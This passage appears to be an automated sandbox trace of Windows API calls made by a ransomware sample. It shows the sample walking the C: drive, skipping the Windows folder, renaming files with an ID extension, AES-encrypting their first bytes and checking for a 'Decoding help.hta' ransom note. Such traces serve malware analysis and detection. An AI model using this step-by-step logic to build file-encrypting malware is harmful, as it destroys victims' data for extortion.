(lpFileName="\\\\?\\C:\\BOOTSECT.BAK", dwFileAttributes=0x80) returned 1 [0038.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), lpNewFileName="\\\\?\\C:\\BOOTSECT.BAK.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\bootsect.bak.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0038.340] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\bootsect.bak.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0038.340] CreateFileMappingA (hFile=0x1c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1c0 [0038.340] CryptAcquireContextA (in: phProv=0x2c0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2c0fcec*=0x5a7c68) returned 1 [0038.342] CryptGenKey (in: hProv=0x5a7c68, Algid=0x6610, dwFlags=0x1, phKey=0x2c0fce8 | out: phKey=0x2c0fce8*=0x5a5330) returned 1 [0038.342] CryptExportKey (in: hKey=0x5a5330, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2c0fbe4, pdwDataLen=0x2c0fce4 | out: pbData=0x2c0fbe4*, pdwDataLen=0x2c0fce4*=0x2c) returned 1 [0038.342] MapViewOfFile (hFileMappingObject=0x1c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2000) returned 0x2d0000 [0038.343] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c0fbe4*, pdwDataLen=0x2c0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2c0fbe4*, pdwDataLen=0x2c0fcf8*=0x100) returned 1 [0038.343] CryptEncrypt (in: hKey=0x5a5330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0x2c0fce4*=0x2000, dwBufLen=0x2000 | out: pbData=0x2d0000*, pdwDataLen=0x2c0fce4*=0x2000) returned 1 [0038.344] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0038.344] CloseHandle (hObject=0x1c0) returned 1 [0038.344] CryptDestroyKey (hKey=0x5a5330) returned 1 [0038.344] CryptReleaseContext (hProv=0x5a7c68, dwFlags=0x0) returned 1 [0038.344] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.344] WriteFile (in: hFile=0x1c4, lpBuffer=0x2c0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x2c0fbe4*, lpNumberOfBytesWritten=0x2c0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0038.345] WriteFile (in: hFile=0x1c4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2c0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x2c0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0038.345] CloseHandle (hObject=0x1c4) returned 1 [0038.346] SetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0038.346] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0038.346] lstrcmpW (lpString1=".", lpString2="Config.Msi") returned -1 [0038.347] lstrcmpW (lpString1="..", lpString2="Config.Msi") returned -1 [0038.347] lstrcmpiW (lpString1="windows", lpString2="Config.Msi") returned 1 [0038.348] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.348] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.348] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="Config.Msi" | out: lpString1="\\\\?\\C:\\Config.Msi") returned="\\\\?\\C:\\Config.Msi" [0038.348] lstrcatW (in: lpString1="\\\\?\\C:\\Config.Msi", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Config.Msi\\*.*") returned="\\\\?\\C:\\Config.Msi\\*.*" [0038.348] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x633ef8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.348] CloseHandle (hObject=0x1c4) returned 1 [0038.349] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0038.349] lstrcmpW (lpString1=".", lpString2="Documents and Settings") returned -1 [0038.349] lstrcmpW (lpString1="..", lpString2="Documents and Settings") returned -1 [0038.349] lstrcmpiW (lpString1="windows", lpString2="Documents and Settings") returned 1 [0038.350] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.350] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.350] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="Documents and Settings" | out: lpString1="\\\\?\\C:\\Documents and Settings") returned="\\\\?\\C:\\Documents and Settings" [0038.350] lstrcatW (in: lpString1="\\\\?\\C:\\Documents and Settings", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Documents and Settings\\*.*") returned="\\\\?\\C:\\Documents and Settings\\*.*" [0038.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x64bf60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.351] CloseHandle (hObject=0x1c4) returned 1 [0038.351] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0038.351] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.351] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.351] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Decoding help.hta") returned="\\\\?\\C:\\Decoding help.hta" [0038.351] GetFileAttributesW (lpFileName="\\\\?\\C:\\Decoding help.hta" (normalized: "c:\\decoding help.hta")) returned 0x1 [0038.351] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hiberfil.sys") returned -1 [0038.351] lstrlenW (lpString="hiberfil.sys") returned 12 [0038.351] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.351] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.351] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="hiberfil.sys" | out: lpString1="\\\\?\\C:\\hiberfil.sys") returned="\\\\?\\C:\\hiberfil.sys" [0038.351] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\hiberfil.sys" | out: lpString1="\\\\?\\C:\\hiberfil.sys") returned="\\\\?\\C:\\hiberfil.sys" [0038.351] lstrcatW (in: lpString1="\\\\?\\C:\\hiberfil.sys", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\hiberfil.sys.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\hiberfil.sys.[ID]g9uZrLhJaygpwRm1[ID]" [0038.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), lpNewFileName="\\\\?\\C:\\hiberfil.sys.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\hiberfil.sys.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0038.352] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0038.352] lstrcmpW (lpString1=".", lpString2="MSOCache") returned -1 [0038.352] lstrcmpW (lpString1="..", lpString2="MSOCache") returned -1 [0038.352] lstrcmpiW (lpString1="windows", lpString2="MSOCache") returned 1 [0038.353] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.353] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.353] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="MSOCache" | out: lpString1="\\\\?\\C:\\MSOCache") returned="\\\\?\\C:\\MSOCache" [0038.353] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\*.*") returned="\\\\?\\C:\\MSOCache\\*.*" [0038.353] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3350048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.354] CloseHandle (hObject=0x1c4) returned 1 [0038.354] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0038.354] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.354] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.354] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Decoding help.hta") returned="\\\\?\\C:\\Decoding help.hta" [0038.354] GetFileAttributesW (lpFileName="\\\\?\\C:\\Decoding help.hta" (normalized: "c:\\decoding help.hta")) returned 0x1 [0038.354] lstrcmpiW (lpString1="Decoding help.hta", lpString2="pagefile.sys") returned -1 [0038.355] lstrlenW (lpString="pagefile.sys") returned 12 [0038.355] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.355] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.355] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="pagefile.sys" | out: lpString1="\\\\?\\C:\\pagefile.sys") returned="\\\\?\\C:\\pagefile.sys" [0038.355] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\pagefile.sys" | out: lpString1="\\\\?\\C:\\pagefile.sys") returned="\\\\?\\C:\\pagefile.sys" [0038.355] lstrcatW (in: lpString1="\\\\?\\C:\\pagefile.sys", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\pagefile.sys.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\pagefile.sys.[ID]g9uZrLhJaygpwRm1[ID]" [0038.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), lpNewFileName="\\\\?\\C:\\pagefile.sys.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\pagefile.sys.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0038.355] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0038.355] lstrcmpW (lpString1=".", lpString2="PerfLogs") returned -1 [0038.355] lstrcmpW (lpString1="..", lpString2="PerfLogs") returned -1 [0038.355] lstrcmpiW (lpString1="windows", lpString2="PerfLogs") returned 1 [0038.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.356] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.356] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="PerfLogs" | out: lpString1="\\\\?\\C:\\PerfLogs") returned="\\\\?\\C:\\PerfLogs" [0038.356] lstrcatW (in: lpString1="\\\\?\\C:\\PerfLogs", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\PerfLogs\\*.*") returned="\\\\?\\C:\\PerfLogs\\*.*" [0038.356] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33680b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.357] CloseHandle (hObject=0x1c4) returned 1 [0038.357] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1725f090, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1725f090, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0038.357] lstrcmpW (lpString1=".", lpString2="Program Files") returned -1 [0038.357] lstrcmpW (lpString1="..", lpString2="Program Files") returned -1 [0038.357] lstrcmpiW (lpString1="windows", lpString2="Program Files") returned 1 [0038.358] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.358] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.358] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="Program Files" | out: lpString1="\\\\?\\C:\\Program Files") returned="\\\\?\\C:\\Program Files" [0038.358] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.358] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3380118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.362] CloseHandle (hObject=0x1c4) returned 1 [0038.362] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0038.362] lstrcmpW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0038.362] lstrcmpW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0038.362] lstrcmpiW (lpString1="windows", lpString2="Program Files (x86)") returned 1 [0038.363] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.363] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.363] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="Program Files (x86)" | out: lpString1="\\\\?\\C:\\Program Files (x86)") returned="\\\\?\\C:\\Program Files (x86)" [0038.363] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.363] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3398180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.364] CloseHandle (hObject=0x1c4) returned 1 [0038.364] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0038.364] lstrcmpW (lpString1=".", lpString2="ProgramData") returned -1 [0038.364] lstrcmpW (lpString1="..", lpString2="ProgramData") returned -1 [0038.364] lstrcmpiW (lpString1="windows", lpString2="ProgramData") returned 1 [0038.365] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.365] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.365] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="ProgramData" | out: lpString1="\\\\?\\C:\\ProgramData") returned="\\\\?\\C:\\ProgramData" [0038.365] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33b01e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.366] CloseHandle (hObject=0x1c4) returned 1 [0038.366] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0038.366] lstrcmpW (lpString1=".", lpString2="Recovery") returned -1 [0038.366] lstrcmpW (lpString1="..", lpString2="Recovery") returned -1 [0038.366] lstrcmpiW (lpString1="windows", lpString2="Recovery") returned 1 [0038.368] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.368] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.368] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="Recovery" | out: lpString1="\\\\?\\C:\\Recovery") returned="\\\\?\\C:\\Recovery" [0038.368] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Recovery\\*.*") returned="\\\\?\\C:\\Recovery\\*.*" [0038.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33c8250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.368] CloseHandle (hObject=0x1c4) returned 1 [0038.368] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0038.368] lstrcmpW (lpString1=".", lpString2="System Volume Information") returned -1 [0038.369] lstrcmpW (lpString1="..", lpString2="System Volume Information") returned -1 [0038.369] lstrcmpiW (lpString1="windows", lpString2="System Volume Information") returned 1 [0038.370] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.370] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.370] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="System Volume Information" | out: lpString1="\\\\?\\C:\\System Volume Information") returned="\\\\?\\C:\\System Volume Information" [0038.370] lstrcatW (in: lpString1="\\\\?\\C:\\System Volume Information", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\System Volume Information\\*.*") returned="\\\\?\\C:\\System Volume Information\\*.*" [0038.370] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33e02b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.371] CloseHandle (hObject=0x1c4) returned 1 [0038.371] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0038.371] lstrcmpW (lpString1=".", lpString2="Users") returned -1 [0038.371] lstrcmpW (lpString1="..", lpString2="Users") returned -1 [0038.371] lstrcmpiW (lpString1="windows", lpString2="Users") returned 1 [0038.372] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.372] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.372] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="Users" | out: lpString1="\\\\?\\C:\\Users") returned="\\\\?\\C:\\Users" [0038.372] lstrcatW (in: lpString1="\\\\?\\C:\\Users", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\*.*") returned="\\\\?\\C:\\Users\\*.*" [0038.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33f8320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.373] CloseHandle (hObject=0x1c4) returned 1 [0038.373] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1db09f50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1db09f50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0038.373] lstrcmpW (lpString1=".", lpString2="Windows") returned -1 [0038.373] lstrcmpW (lpString1="..", lpString2="Windows") returned -1 [0038.373] lstrcmpiW (lpString1="windows", lpString2="Windows") returned 0 [0038.373] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1db09f50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1db09f50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0038.373] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 9 os_tid = 0xa10 Thread: id = 11 os_tid = 0xa60 [0038.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*.*", lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0038.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0038.493] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) 